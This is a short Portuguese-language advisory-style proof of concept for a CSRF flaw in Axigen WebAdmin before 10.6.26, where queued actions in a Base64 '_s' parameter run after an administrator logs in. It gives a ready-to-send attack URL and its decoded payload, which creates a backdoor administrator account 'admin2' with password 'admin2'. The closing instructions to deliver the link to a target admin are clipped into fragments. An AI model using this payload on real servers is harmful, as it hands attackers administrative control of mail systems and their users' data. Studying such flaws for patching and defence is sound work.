
Axigen WebAdmin CSRF Vulnerability
Ações críticas que alteram o estado na interface Axigen WebAdmin são acessíveis via requisições GET. Embora o token _h proteja contra CSRF direto, a aplicação processa requisições enfileiradas através do parâmetro _s (breadcrumb) imediatamente após um usuário autenticar.
Um atacante pode criar uma URL contendo um payload codificado em Base64 no parâmetro _s. Se um administrador clicar neste link e completar o processo de login, a ação enfileirada é executada automaticamente no seu contexto.
Versões Afetadas: < 10.6.26
Para mais informações, veja a Base de Conhecimento da Axigen.
URL Alvo:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
Payload Decodificado (parâmetro _s):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s na URL de ataque e entregue-a a um administrador alvo.admin2 é criada (ou sua ação personalizada é executada).